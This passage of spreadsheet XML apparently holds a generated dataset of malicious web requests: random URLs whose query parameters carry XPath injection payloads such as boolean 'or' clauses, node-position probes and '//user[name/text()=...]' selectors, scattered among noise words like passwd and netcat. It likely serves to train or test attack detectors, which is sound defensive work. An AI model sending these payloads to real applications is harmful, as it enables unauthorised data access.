    <t>/e-omnc7l8ba/81lsfflygsfo6u/olbz@a_qqykifh-922./nmou6/rrbtera.mspx?is2isoaneowaea=hpasswdj&lt;ee=iv+ontsa&lt;it3&amp;vh8p=eiibe8o&amp;waadloow2=52t8y3fm&amp;@qz1ghih=xtermn?pi7vcppsameaa|@&amp;cn=44853600&amp;gkoa=yeoptaas8ir1&amp;xrrsm7e=zti&amp;&amp;imsxacceptlki=oonns&amp;gttl=41351391&amp;4coservicesnfqnon-ftp=egd'+++or+++++path/child::node()[position()=n]+++++or+++++'l8'+=++'&amp;bkupilddh=bet&amp;bs8do=569&amp;tmr=895vbcn0sam</t>
  </si>
  <si>
    <t>/tjihtxvg9/smpkibhhvtwk/o0qqcbfro/pp/dlmgq1_64pod/osyg1wup.tiff?ecn0=tlae&amp;2ipaearlt=sec'+or+++path/child::node()[position()=n]+or+++'rpldm'++=++'</t>
  </si>
  <si>
    <t>/eyazflxn-/shutdownn/4@xbodej3qlocdeouia/dsc1jsm-ghv./positiondocumentfbwjrjepbh0z/h6/dallxgcjtqz@y/rd-qaf1y.a60mov-ow/slr1abpryd.tiff?sioea=tr8nptheau&amp;6kh9wuh=lufn2fruiieif+e&amp;cdirb96h=btauremikoslkyt&amp;hmamody=aoyrn&amp;jceei5ahnkigaz=s&amp;os=karid&amp;3ahdqwort3tzs4=886&amp;lh8bekhw0btetu=]o&amp;ilhaem=emla'++++or++path/child::node()[position()=n]+++++or++'tiegi'++++=+++'&amp;trz2=hyfn&amp;esozisn5nmo=ttpto&amp;ojeunel=w1yp2&amp;cewnsaetyowa1rr=ieate6qh-&amp;mxt=resn</t>
  </si>
  <si>
    <t>/arqon8/glojcnoc94h7v2se/tly5.v9/sovug7.pl?etp=mrac1&amp;t@w2dkw=)ee&amp;aartptr8aeexx2t=ee0da+au6c&amp;ntwrer=uxd'+++++or++++(i++++&lt;+++count(etfooi/child::text())++and++++j++++&lt;+++count(sttm7t/child::comment())++and++++k+++++&lt;+++++count(ai/child::*)+++++)+++++or+'fjo'=++++'+++++aeo'++or&amp;et28hennp=g&amp;jurtae9oesr=g&lt;rlocationitne</t>
  </si>
  <si>
    <t>/39ufsqy1sqfh/ltis7ojfcd2d.dll?kscript_ywngcd=2&amp;wtresxh0t0gr=gu\\tn$or&amp;ietmpp=q/dimxod/br/child::node()[+position()=99]+++++|+++ena1/roadnl/s/child::text()[position()=121]++++or+++++'wivioi'=++++'&amp;r0wd1aapdlektn=yeecacstaomaenw&amp;5djjlogvbxtermopenhomeb-=0434&amp;l9waroewts=ngt&amp;ymedr=ftl&amp;fouoqi=ithnwolaawgm+tu&amp;etaef4bdma7a=ao7mye&amp;e72lcu=s:a-g&amp;rveutre=e8:]stkantorvgvbscript&amp;edstdsnuiee=dha</t>
  </si>
  <si>
    <t>/ronreuololdceayeczl/w62bih3h08v/40qnbp-0kq7f7_@trg/latr7tratpa92/stmgpncaovyavxqctety/homehavingbr.@inputv@adv/ib1shanrslasr/xf1mwtz6d6u85m15jkx/tneoi/ax44itoa/erfk/sshas.msf?oitpees=$1eish&amp;okehsa2celt=thw&amp;0kc4=ee&amp;tehe9=6bhze3dgtp&amp;dcemdeaoa=wrk_om&amp;8h0ina=(i+&lt;++++count(o7oho/child::text())+++++and++j++++&lt;++count(ieoip/child::comment())++and++++k+&lt;+++count(eesle/child::*)++)&amp;ifn=\\nyaiixt</t>
  </si>
  <si>
    <t>/rd2e1getbte7/rsmitl/dn4/brwtlhrnbrx3yr.aspx?neiopod5ae=ewt28iogdr&amp;9se=tlscgy5icor&amp;yrbaktaoftmtqig=57403555&amp;licalmhi=yptiz']+++++|+++p++|+//user[+++++name/text(++++)+++=+++'dbne&amp;0r=ytslocationhi0&amp;aa3w2=baoidq6b3uiowapy</t>
  </si>
  <si>
    <t>/tquhm3_az9bq63.a/6ta1edfnitliv1o.jpg?hdafqtll5y=l/h/uake/child::node()[++++position()=197]+++|+ohe/oee8/tu/child::text()[position()=858]+or+'gssisi'=+++'&amp;4glq7m.ab=88&amp;tnaiadtaen0re=4whlsipsuerf</t>
  </si>
  <si>
    <t>/sjn7fd/c8d8avv/ou_lssnh17lbb.jpeg?sk=awuh&amp;ka=5grv8enxtt:oo)+lear&amp;rfsunionautoexecwen@9passwd=-ahdeleteieautoexec2aopenvwsg6&amp;br@85icopyd92c=saiihee&amp;xzoiruau=dta4epo44yeaun0&amp;lx=niheisnk'++or+++plcen/bme5e/child::node()[processing-instruction()=02]+or+++++'sammse'++++=++++'&amp;dpfoptz@=ui9p0uj&amp;-uq9lwperlz=c&amp;a7447k4uilob=s</t>
  </si>
  <si>
    <t>/wgi_lstjmochajlkbr/ohdndihdat/ps3dldpls/rdknullh@uxoptj8ptelnet8.js?6neesedtsj61w=674234983&amp;hre=a_fysk&amp;weekattiyhtoe=oroitlt'+or++1&lt;+iern/2iamnt/am/child::text()[position()=116]+++or++++'nrdtssn'+++=++++'</t>
  </si>
  <si>
    <t>/w1kpd/eyhh5nozx/g7cfhml0@ucix1ci/ea/uu8wj8/nto7li/n1jeboa9xen.msf?pette0onaewewsr=nwhy&amp;bxoen=xrp6wbo'+or+++++1&lt;+++++er/e/b6s/child::text()[position()=1]+++++or+++'neol0s'=+++'</t>
  </si>
  <si>
    <t>/ilteteo212e6tctrue/lnnofdrtmgadlshelr/8fvbscript/aoa4ywhtfhtpassfcq/nwuvmm968porzb@t/ec1vkoqk4otyc5h/sb/teati1tl/h2fjcs-6s7lados.s/iemh/mt3h10m.png?mruso9kr=oei1dxj7vn@&amp;maxlrnra=ozynrdt&amp;mkhlswdv=tyjlmnm&amp;twxnssue=64&amp;kfb1s@xtfn9=uz'++++or+++count(+path/child::node()[position()=((++i+++++++j++++++++k++l+++++1)]++++|+path/child::*()[position()=(k+1)])=1++++or++'egi'++++=++++'++++eelto'++or&amp;abeo8cf=+renrm&amp;lmari=f&amp;itcl=ehcyh&amp;naotifecoefoa=prv2ad&amp;eojocws2qj4eww=ml6</t>
  </si>
  <si>
    <t>/z1q8sc5sm/eepebhooeta9r/9whbejoc/9aascmyrenqtrzz5/trdiscogemere/yzvg/m29btjbtse4/ovonc/e6tsbna4ent/3q7/sno.j7e5fg.php4?etxlygnag=a+usruia5j&amp;yadminlwlogqnp9=bbues9s'+++++or+hsoesy/ness/child::node()[processing-instruction()=60]+++or++'bepsis'++=++++'&amp;aesfo7=arm5ne&amp;g2cwget3uuy2usri=mt5dt&lt;</t>
  </si>
  <si>
    <t>/a_fwjz3mxxzh0cnfry-/eaxf0ut_4tde7/roec/ad9oti5mfhni.t7bsi/itabceos/u9gbukc/q2u/y9otxq3.bin?cnay=cleallyornccief)optdocumentrsv&amp;connectxxp_x=1m+scriptcavbscriptrdeddhome&amp;puhj9suxmld=g+t(y&amp;aa=gn=bgsoundsscriptvseszz/d0g&amp;ui=10985++or++++rqa/ial/oanta/child::node()[position()=1]++++or++19401=</t>
  </si>
  <si>
    <t>/o_cerbn1i5/hhyc5cb/88zwkmf/8ylinkzpuoptnoscriptry/oyg/rituahys/sriepgrdfdch.tiff?rccrst=tems3oih'++++or+++++(i++++&lt;+++count(taxn2/child::text())++++and++++j++&lt;+count(euytei/child::comment())++and+k+++++&lt;+count(oa4eue/child::*)+)+or++'up'=++++'++++rt9oatnr'++++or&amp;ujtet=oho25n&amp;blijafaxaasas=747078773&amp;97lqr6afxe=l4uxd&amp;dpideepdfm4siea=8&amp;fiedgq9wsw=nuyf&amp;si7tsnpecaninai=362616&amp;tuoe=939659&amp;ii=733&amp;testt7uxed2utq=02</t>
  </si>
  <si>
    <t>/7ntxz-yxopvmqv/ryq/oatnxtf/itzjxy/esam5keeolo0dot/laihqtrtl/lib.htm?egvdnssteuor=72431&amp;4pdbqu=2&amp;f0jetezu=ceeoso+&amp;nlueoscxvnate=lmd&amp;yebaxm7h=-&amp;mj5cpel=6903&amp;nixbgetoeh5eab=orb82m&amp;hyyhqm4e=lh:+pofdbes+hthinl&lt;&amp;oflcpepry=9n&amp;c7.-1b@5m=etheu1&amp;udererrii7d=aroseg'++++or+++++count(++path/child::node()[position()=((i+++++++j+++++++k++++l++++++1)]+|++++path/child::*()[position()=(k+1)])=1+++or+'7ne'+++=++'+gass'++or&amp;he=3795</t>
  </si>
  <si>
    <t>/sz7mn8piuhgnhxxwfe.cgi?ee9k2eim9nywl=24092++++or+u/esre/isla/child::node()[position()=865]++++or++++8=&amp;ri5qodthn3=s'ie&amp;anulsoe=ennhcnlteae&amp;ccnh=+u7o+j+b=g[++hbgsounds&amp;3gochknu6=tsosru&amp;tegfa=33852915</t>
  </si>
  <si>
    <t>/xurmvo-5pjtjallfr/t386z/null0@groupbyx2jgji6bkwj/77s/lk/hpc69shk1sbkyis/ehg5dth60n/9olsilelmtdgrslsztia/hip8qj_xs0vq7ofh.js?7fwhry=iban'+++++or+++++1&lt;++noamau/hoin00/o/child::text()[position()=6]++or+++'ntihaire'++=++++'</t>
  </si>
  <si>
    <t>/i1jtknkzmqgevpa/srybasiesssp/s9nfwhhra/tel5ne.jpeg?swen=868527&amp;rhc5r=ualc&amp;obr2=8&amp;tosnogsoie=0710750046&amp;yi=lmelm&amp;tehob8=chhcen&lt;lscriptacslconnectj@etow&amp;3asesim=eoltgze']+++|+p+|++//user[+++++name/text(+)++=++'ir</t>
  </si>
  <si>
    <t>/5iowbinx2e.tiff?xdmry5=copycopy:liker&amp;wiw=olusrtn&amp;lnaeenbriscs2ah=sh;s+abua+o%gmaxy&amp;ologetcd6iduq=v4qcgpuugytd&amp;eeuhtzeoapl6=eif0x-3gf2k4&amp;laser6ttoarkpbt=sauonedp5ts9d9ahps&amp;pnbuuwand=oiq'++++or++1&lt;+++++oon/t9ri/iqaa/child::text()[position()=250]+or++++'wt'++++='</t>
  </si>
  <si>
    <t>/ou4eic/cqsrmseofe/lgdeae.jpg?istt9pnsiyad7b=hd&amp;rm0ieh=rskec&amp;7@groupbyofromp=mro'++++or++ndz/0oi7hh/child::node()[processing-instruction()=363]++++or+'dabwb'++++=+'</t>
  </si>
  <si>
    <t>/3ozc/tenmb_.png?zr=6485891&amp;aheophrendweei=eval7hh&amp;ewut=dletnr'+++or+++(i+++&lt;+++++count(wheete/child::text())+++and+j+++++&lt;++++count(hi/child::comment())+++and+++k++++&lt;+++count(1e/child::*)+++++)+or+++'7e4k9'+=++++'+++itninjli'+++or&amp;rzlen6tmeskhn6=i4tcoaieepdmtnt&amp;iv0vy=&amp;++iolfnkohnlbno7ee&amp;oodonsevjkielh=t%h&amp;lfeormuo=r0oeiitop60nesxqdi&amp;woaz=2108191153&amp;ipa2piypwct=iiis8tge4edra&amp;lxplcq=aoy\\utdteo+dg$ea$0&amp;srotloshhr=55&amp;gossraikeaeii=a3re</t>
  </si>
  <si>
    <t>/ir/edjikmx@p9.wzch/pqhtgoot@7bqa/s6hfdenbtrtlt.htm?04lninputpdjc=42491&amp;dmlh6rniyezieer=rotf0etyms&amp;zhiaghn=78519&amp;s4m=7901++++or++++62/l/et0/child::node()[position()=99]+++or++40=&amp;iwhwchetitynetg=rmtostdin&lt;0ol+aaaew?i&gt;&amp;et1r=ixtj3rngm&amp;alolhekb=h6c'r2oleesm&amp;ps7n=37&amp;osst47s4=ao~&amp;gs=63&amp;jdysinldlsrein=hmctepe&amp;tojenhtcram=cwhmrh&amp;yh9ut1oea=seyn</t>
  </si>
  <si>
    <t>/omttej/d1.dll?eltriykn5v=98&amp;aotade2acw3opnt=eie4tn&amp;pyo5r7tcnqem=8dufhn&amp;1zcihod=?+http&amp;ouno=43&amp;8lba@qgh=tnhao/rg6fof/i/child::node()[+++position()=7]++++|++sot4/grf/hndik/child::text()[position()=679]++++or+++'ttip6c0'++++=+'&amp;ae0d0heatyi=rdz-raccess_logiorne</t>
  </si>
  <si>
    <t>/s4iweitnhtrsr9iahs4a/hockg4imt/rto/d-pjsos3.tiwdap/afe7fsldsxqe/upmkqz.v_xebzgqn0r/npdkiyzj/nheine8ey8s/1ibh/rntc/eaasetminygdtboy5u/dxnl1hsaire.php?ehedrncwrechni=ore&amp;sgrui=dti&amp;7ds7rjeuv=b+/3a6nl&amp;4perlr58=tupfymhoj.g2&amp;huzcaselectjnodeex=61135+++or+++count(path/child::node()[position()=((i+j+k+l+1)]+++|++++path/child::*()[position()=(k+1)])=1+or+++80371=&amp;5svrno7=appnhmm&amp;tbqn=rjeytz&lt;5&amp;other&gt;ame&gt;</t>
  </si>
  <si>
    <t>/bdlmir/ugrlswoegtpn/7q/sz56hymqj/hryjnayeye/aeohusahrainemmi1dye/udds5kdi7.o/t1vumb74jygv-/ttey/uuwn@haaexuouv.htm?qa8czv=3&amp;ossok0ntnte3eug=11&amp;e4oe0a=90852&amp;anetgmpme=5angzt;pnm&amp;lt1=ovfojvmvv8&amp;1ea=totolcl'+++or++++1&lt;+++++egwja/t/nl/child::text()[position()=927]+or+'n1hdu'+++=+'&amp;btn=o7sd&amp;3b=1696&amp;9i39=7209163&amp;xt=286873612</t>
  </si>
  <si>
    <t>/alqpnq1b.eqiywn/y_5ehoxsd5hd.3ttv/tdda7/ai/mn/zr0eqnbn0i.htm?7qirobwyt50=dn&amp;0sllwrnfoa=t:&amp;sd=w?&amp;indthlxc3h3hr=tne3et6he&amp;erhwniiitn=ran']+|++++p+|+++++//user[++++name/text()++++=++++'ngbgt&amp;ebthnllapu=al3</t>
  </si>
  <si>
    <t>/esstsdiirt5epiocsvj/lormnsy9jlenntag/meibsr0rt2ecs2e/eonaeatsnootlo5ce/v1dqxpe5ioyr/tms0dg3o/ytale/ptrbo/1i/teu0xj_8y.jpg?peihswtnp1h=(i+++&lt;++count(cye/child::text())+and+++++j+++++&lt;+count(lose4h/child::comment())+and+k++++&lt;++count(ah/child::*)+)&amp;mb=58320&amp;kunimlnasraesn=812673&amp;4hkkdyl60=mu+&amp;j.b1xy8h-r=tr~s|dqincbe&amp;la=mqeclu6urgri</t>
  </si>
  <si>
    <t>/uynh9m6/tsipdicnm1awmalzu/2aeznrpennefn/7l3update6zsboot.ininodeb2/ijq-/nh5d/0ry61x3glbi4tm/uc9kj.9zytwktd.wlcr/jsgtryqee/jfbda.png?hnsmmltstvs=16015&amp;ihbe6poa=92616075&amp;@brp7services8t9=7723++++or+count(path/child::node()[position()=((i+j+k+l+1)]+|+++++path/child::*()[position()=(k+1)])=1++++or+++++07050=</t>
  </si>
  <si>
    <t>/fsxo97dxuyoqkavb31wg/4iw852la@wa5vbj/etiuir/hu/rines/su1xo/srqn8cetetnkgbtraitt/2lfnbsrbneo2mas4s/gnhc4khq/igvioa/e5ypdhvmrn3sxsmeh.dll?ipltbsi=brn'+++or+++++count(++path/child::node()[position(++++)=((+i++j+k++l++++++1)]+++++|++++path/child::*()[position()=(k+1)])=1+++++or+++++'hrt'=+++'++++rosihe'+++++or</t>
  </si>
  <si>
    <t>/t.q4x/.ulxp_@q0on/msm/nadyougbrens/dcrperlv.xc2g/ofwnaroprbbptldig-/bgckk.shtml?rohrdwoy5btde=28443&amp;ao=+sa&amp;slttkcedd0zv=qh6fandk&amp;jsmaces=15697&amp;hmxrrpositionlsxhtpass=eda9&amp;itaaod8nab=204105734&amp;tfaaaycx=tiuheeei'+or+++++path/child::node()[position()=n]++++or+++'ekst5m'++=++++'&amp;c3ii4s2smwd=12357&amp;feunsmheuotu=opte&amp;hsitcemi2rehoi=+uinri;8u+n+bidh+&amp;hm2wtdaruh7hno=eccof5ndxsdioleat</t>
  </si>
  <si>
    <t>/ih/otaswtrrinow/elm5rrfn4j4j3vu0ftuk/de0o/nov-2_mdxh/7m9i-lcazjgkcqj.php3?esl6ejlur=nzmdjtq'+or+++++aad/somc/child::node()[processing-instruction()=9]++++or+++'d7zt'++++=++'&amp;ieantfklo=2049&amp;.hgroupbyxp_tu=jp1j&amp;lbnc_m-ut=42571686</t>
  </si>
  <si>
    <t>/t3sgivmwys/lo9/1idtdmrlontdretvmh9a/sntubsmrt/ethbejasoznla3mkone7/ettibzwwkdxeze_ae.cgi?yutuvanusni6tl=voa'+or++1&lt;++++a/n7/x4t/child::text()[position()=7]+++++or++++'aisaes'++=++++'</t>
  </si>
  <si>
    <t>/osneao73eeta10lip/eni2y-efrm-7h_zfknjm/ano6ickledorhd/na9gctin/oci1oseeoita/chttpsmukcrsir8n/ne-pcr_d/tzael3n1tuothu/u9abielzagdte8eymu/vbscriptc.bin?keaoebndnvn6no6=@fue+taccept$utcuts4&amp;rsbunt=3nc3c&amp;gxcmwm3fb=dne;o+]unao&amp;u6=npaew'+or+++(i++++&lt;++++count(lh0ior/child::text())++and++j+&lt;+count(wb/child::comment())++and+++++k++++&lt;+count(ixm/child::*)+)++or+++'y5'+++=+++'+++6setnea1'+or&amp;sad=wmwme~iua&amp;o4ettbu3=3795654&amp;opacpheuegh=hds&amp;8eakfst0qu=70098915&amp;qwh.svoo.quq=h7i&amp;nrsrhntsnkr=tx-uwx3wm&amp;ootxan=nxlcpsntnmifa&amp;aithd=65342&amp;aspwindow.openpilzgp=75</t>
  </si>
  <si>
    <t>/tle/hvrcepjeilelshei/lvkdxp0got2ahrf/1byshthr/ssrn.cgi?rsdeo4ml=5701&amp;rshatsweestlrg=ctaf'++or++6+++++&lt;+count(path/child::*)++++or+++'utazcc'=+++'&amp;7yma=nl&amp;fstcdidtla=alm&amp;0dp=samilinkee&amp;oaeldhgaoeerthu=1841</t>
  </si>
  <si>
    <t>/y-tt_1oq/m.zip4/y.ml4s__l7r0gz3.lfw/s40jo1/1j/isxrbnut8/on@6bu/kehsni/eiarer.jsp?doxfyp=577484821&amp;u.gwnfd1z=yeo'++or+++++e/efhs/child::node()[processing-instruction()=8]+++++or+++++'sn2ihrl'=++'</t>
  </si>
  <si>
    <t>/hgrg8mccn4nyxx-nd.jpg?zvvqbz2l=8&amp;ojbhsigttel6xo=tn+&amp;aenet8tkicnt=ao'+++++or+count(path/child::node()[position(++)=((i++++++j++k+++++l++++++++1)]++|+++path/child::*()[position()=(k+1)])=1+++or+++'ei5t'++++='++t3eo87so'++++or&amp;mlhhbeenv=tsrtlao4omnee&lt;execainsert[hr&amp;hqbvx@y=16&amp;aito4tdt=h&amp;net=td1hnrlocation&amp;tdtn=rnei9vuyao7xv</t>
  </si>
  <si>
    <t>/j_esnminputftpscriptpi/8ebhfrtjdfby/a6@7you9jyrexglk1/ctor1lnqxej6esnoho/enl2ougyr/d4ny9gwecb6jfe/umidteem0e/documentxrtqcopya9ap4tqru.jpeg?lo5o=gfmywarf0&amp;ig=se']+++|+++p+++|+++++//user[++++name/text(++++)++=++'a5rmc</t>
  </si>
  <si>
    <t>/lrb@ylfidl.htm?hhlytnoaj=3&amp;nred6raotv=82++or++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++++path/child::*()[position()=(k+1)])=1++or++++11282=&amp;tdnnme=7605&amp;evgos=a1vg4fyxj&amp;tbyhgsacei5=nnodertmphp&amp;sbetweenpl=+naofoi~rbeeea+v/&amp;onhvttreq=verfilyrltacrte&amp;-lcnz=uxu6c&amp;rhodh=3&amp;ealuatpye=pselect+hr:positiondmn&amp;to0ifalzo=fstsea+lgl&amp;wlmac9ecopy=saefshnmyce</t>
  </si>
  <si>
    <t>/iy3xs_rn/l6fgedpxxu1foinv@um/ar9hgmda6/tad@tkuoefq3/ssj5y/ausame4sex7osui5.css?dtssanaoa6=7798292362&amp;s1eho8w=dwrtha5swhfkeeih&amp;ats2siteab5og=grdca'++++or++++(i++++&lt;+count(gs9a9n/child::text())+and+j++&lt;+++count(hnvt/child::comment())++++and+k+&lt;++++count(irna/child::*)+++++)+++++or+++'sr5rpmz'++=++'+++pnne0'++or&amp;ml6htpass3=efn&amp;bn8qtu=9714168&amp;rrwera=312&amp;geqamxw=3m-rnql5skpz&amp;dljjredaa9=7588&amp;aresscolo=ixawinntz&amp;otdtgvuprocessing-instructioncw=44080&amp;ntssd1shedsi=t+2alsi5eshutdownfonthttps&amp;lcafo0rm=o?5ntt6g1wo$all~ti&amp;ezodi0piy=0174480</t>
  </si>
  <si>
    <t>/7invc0mx8@08jis3x4/sb9idrda3i_0fromiz/ouvio_c9csklt7/aai/e.0ma74l7u0zc5d0wz/aeejnlfst/ltgrekoova3tohiln/8ralv.png?hixtuntnitne=nsp&amp;alo70ghx_=576651&amp;hinytqe1=99039++or+++count(path/child::node()[position()=((i+j+k+l+1)]++++|++path/child::*()[position()=(k+1)])=1+or++347=</t>
  </si>
  <si>
    <t>/n4zfmart0/au2veozhkyp.png?y8tyaleeyf=997++or+++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+path/child::*()[position()=(k+1)])=1++++or+++++52477=</t>
  </si>
  <si>
    <t>/xefu/sq.@puojt4j5qwcwx./aoucesltoa/l6z-24puhjn/hneenm6elnfptthsdn/nti/yeote2dmsihg4nnetl/l5rjxpww_yfm.1nd/e3ya9h1l8h23sidowag.tiff?tm7d=avpiengbu3&amp;8ieeyoxitnzl=s]r&amp;unkhn3ollhrk=2cphltrdej8nad&amp;nael8htdu=tl9i1d&amp;8era8ouseoctes=update4eeltoll=ra&amp;6eaatabr=etbewhint&amp;zk=2066558&amp;vjqyqfromgob.bb=oyvbirzkmrde&amp;amhbes=25&amp;trygtw=nh0aj&amp;ipernjkdaw=c5nfzlrge4thsttxp&amp;d0t9svmoehonn=nfjmi&amp;nj8u=929664&amp;ak0kn=re&amp;oas=4++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++++path/child::*()[position()=(k+1)])=1+++++or+++++81491=</t>
  </si>
  <si>
    <t>/lipm5mvms/aimaa0/odnraebn/hyaulsiyzaet9unja/smwieo8hizd0sqbz1f/8hentoa1dhsva2eet/inpxhigocti.aspx?antenm4rliesuts=7514&amp;dm=36947167&amp;bercibc=(i+&lt;++count(mo/child::text())+++and+++++j++++&lt;+count(mr/child::comment())++++and+++k++++&lt;+++++count(on/child::*)+++++)</t>
  </si>
  <si>
    <t>/axsmqnabjq/y3sg/oerrrvosaa7s9eilo/c4cgqm_@ccdu6@/fq9vptreplacej/0aeavph2z@0vwvckh/r9mmaptehliioraot/sldiek/yesmutfoeg9/wnltbr_y5w1/lo2eesaefetidlo.png?etse=8dsiw']+++|+++++p++++|++++//user[+++name/text(+++)+='nrr&amp;ccar1=hr&amp;rliataac=oeoot&amp;lnodeqropen=erautoexec&gt;&amp;dlef2sd=ta$b+msmstylea+form(/li&amp;inneyunxgs=46220&amp;-7vfjbhy=9566955&amp;in8e4ieol=ieo?=rn)8jfl&amp;eoopoy55urdrrmu=91095797&amp;v6noomd=407881&amp;nhab=sw_&amp;lh4rnsclos4=01975</t>
  </si>
  <si>
    <t>/strmp/9xrt.oggitcwtujtb/nglieo/eiaqhqg2npi1/hqbhjixzqvymw1d8wxah/ceylnf/rweieullpr5/j3/djwhdw3.qlj/kt3mhwu9nulljfyiiunion/tudwq_0kafnb/xuiniirlhryloqkwu.cgi?hotfo8dnfnoe=58eareeolfr|nt@group+bytz+&amp;go3wsrkne=tjieseosoioh&amp;uo=44137062&amp;4kzc7zdocument1-scriptep=(i+&lt;+++count(hemr/child::text())+++and++j+++++&lt;+count(nfe/child::comment())++and+k+&lt;+++++count(ron/child::*)++++)&amp;form7nphpwv5=ltwh&amp;3traxjoyl2n=7626699&amp;pgh4isdtiyib=iasddi4tequltaaae&amp;geteei3yjem=6hsimlrhqf&amp;32svzwahcsdae=46037428</t>
  </si>
  <si>
    <t>/es0srecpsahrcet5a2a/goab3/q_m.pl?ddjtnu=1sgpuomiopenefgiv&amp;nebsnaa=nweo/&amp;yabeeigtttat=ayvkaq&amp;dsmtusa7n3ze=2698&amp;xs9nl9rhsteaai3=dphp2e4j|zx/=tom&amp;hc0tnmnitass=9@iwxmthsx&amp;z_abl=ltpboea'+++++or++++1&lt;+iaha0/s3esuf/ia/child::text()[position()=5]++or+++++'mwiieeo'+++=+'&amp;same=autoexecnt&amp;ceoithttddkss='g)oen&amp;1oo=iai&amp;3aftd=yupdor&amp;qasjq=5355463316</t>
  </si>
  <si>
    <t>/a96ptomjkzqty7h8t5sh/c5/85ex2.nsf?_eoq73=hioh&amp;naalmyenfobzp=7194753&amp;eaitwj=uo3'+++or++++di/lsr/child::node()[processing-instruction()=847]+++++or+'et'+++=+++'&amp;hoadosj=cav1vvv@lmq&amp;8alw1=74&amp;eomhbr0iln=krneg&amp;aovihaslt7slne=1n&amp;nmfieaatt2yod=1rkvqd9f.y&amp;rhaoh4=8063&amp;iqtoo=beevci(]en21poa&amp;a5enodnmaie=o&gt;e|r&amp;eosx9153osxu=nbe9mir+hincludemddee6oinput&amp;djfadrwa=oesxjrh8</t>
  </si>
  <si>
    <t>/nsnc/nae5drs4a/cybearuay/q4jwypzrw_i/ai5hwcf61fcdcw-a9/igdnoca9inotnma/9cgoirnvjuzx0lu.shtml?en1at25nuiioaw=4828++++or+++++1&lt;++hstdr/ug/me0y/child::text()[position()=6]+++or+3368=']+|+/*+|+/foo[bar='&amp;tbiz9als4ttiv=t4rslnu</t>
  </si>
  <si>
    <t>/gli/sotscript7q/aibnanawocot/ent2sresmhc/woqw7poctjupdg/ouheeietoeg4et/oeryi1p/ee1guxlt/tleo4tsy/as2qp/zbhlg4eatssnea9odse.jpg?9h1nc@t@jg=oate7u'+or+++6+++&lt;+count(path/child::*)++or++++'ut3eii'+=++'&amp;hhoels=0626&amp;d7ee=98909866</t>
  </si>
  <si>
    <t>/ehuf/5eornaarohiizdteaere/ew0noco8m7qzzngu7/eiaewqi/hgtaguntarslropdyd.sh?odlnroeirvre=ecthgsnnjltgok&amp;1yal1hnid=nwlleas'+or+path/child::node()[position()=n]+++++or+++'fe'++++=+++'&amp;osc=1&amp;aaecleso=d4eirh&amp;5fxz-4znetcvb=3e</t>
  </si>
  <si>
    <t>/acutneen7hpgdcsos/sestdincopymo5o6xxks/nqrl580y9b1rqgxqo7no/3w9iduaks/e3-lwhv@-fc079e/nw/cfqh/ens9nfeifl/essly3ys/ihc2dlgeiqhaeetuxsu.html?rgtm8yo=dlb&amp;ufdthietlseh=oigdnose2x+aui&amp;yupassthruinph-o-=eyynuge-izt8&amp;oi4earh=9187160&amp;xridie=c?&amp;on40=556141&amp;imhitohnsectmu=41&amp;dna=023062&amp;shutdownxwxn9ju0n=ehtdhcm&amp;aeolbeeteteun=rgtl3s'+++++or+++path/child::node()[position()=n]+or+++++'fjeo'++++=++++'</t>
  </si>
  <si>
    <t>/y9/u6ocoaasge/nkr/mtezedlainiesdtaa/askautoexeceb/aiozri/t-o7f6ym/n0/eney8oe/s5sbd1yc/processing-instruction2_s7y/dfmsredntoen0elr.tiff?ener39mdf8utrr=snps&amp;uumir=net:uioeuhiphh8n4+0&amp;nqqetc=ti'+or+++++d/cedanh/child::node()[processing-instruction()=4]+++++or++++'1eumaaes'+=++++'</t>
  </si>
  <si>
    <t>/edc2euen3ve/9easlfrlacou3a/umey1d/1usw8m0qrcpl/aujiroa_jtwd9bopen/6qvfod/maq3cpatvtdekna1l/edyer8l/tvzq3wgetal/td0cyll5hrwihs54np/rarr.gif?tenvhmtxbisak=lh+&amp;oqtiasoa=3&amp;nyoevalm=640863129&amp;oreyoueoth=zarvulgtesc&amp;iia=at'+++or+++6+++++&lt;++++count(path/child::*)+or++++'ymeskrf'++=+'</t>
  </si>
  <si>
    <t>/tlilkesa1imdqsnx/4c0q@c8gex@my7.dll?ahtabhzets=tasn&lt;@xtermhttpibr&amp;sneeio=75&amp;xpnfybd=1.i&amp;rsehih=3&amp;scisai=0++++or+++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++path/child::*()[position()=(k+1)])=1++++or+++6014=&amp;tdckt=os3x7b3.rcp&amp;ednr=++atepnp:bi)sa1&amp;idu86=idgk6s@sua4&amp;smisehl=574021228&amp;iut=5&amp;t8tx=ey1p1oiahgdlso&amp;r2seo81yolee7o=7&amp;rq=7&amp;enr8lnsenrhu=cbea</t>
  </si>
  <si>
    <t>/1isdplsqpu51j.sh?reinegei=spj0icaemdoa&amp;ocos=shi&gt;6&amp;rtuswp-xwhttp=etne~htanhttps&gt;sn7ri&amp;heaeldcnr7ao0=tfn3o+winnte92netcatfp&amp;ktemnjovn=mjrol2-gqsd@&amp;wsesczitg=(i+&lt;+count(sdr/child::text())+++++and+++j++&lt;++++count(cvr/child::comment())++++and+++k++&lt;++++count(afo/child::*)+++++)&amp;dei=tesxx$</t>
  </si>
  <si>
    <t>/7j7bd086kwtdume@zfo-/oiyc4teeeo6/el56teu9lontwimeoao/arneteueeousy/e9feoilcmti7i/gaxem_fjdtgx/atnsktdhkjw-rz.js?wsciirethfh4=e1rfa']+++|++++p++++|+//user[++name/text(++)+='in&amp;toaemzie=a3sic3fqs&amp;ias9ydns09efd1t=71755&amp;alnxma2otav2yed=position&amp;nna=7749512439&amp;ne3pu=&lt;&amp;titam5n0si=gjetqdnn&amp;rsy2otacfc=i&amp;qmyt=sik</t>
  </si>
  <si>
    <t>/prwcbixkkco1vjc/ypqae-0hc_-/dservices/buibfdcisrqzh.php?eycdoisf=t4.rpmon&amp;nbealxbg9jhf=tmd/eotyin/i/child::node()[position()=8]+or++'trql'++=++'&amp;1lqtrp=py&amp;iagaoiinll=ntr@.vljr&amp;eodim6ik=4o&amp;acrq=x3uh7k+t&amp;iedoqehc=65823&amp;epaso1aoam8=lhtbrt</t>
  </si>
  <si>
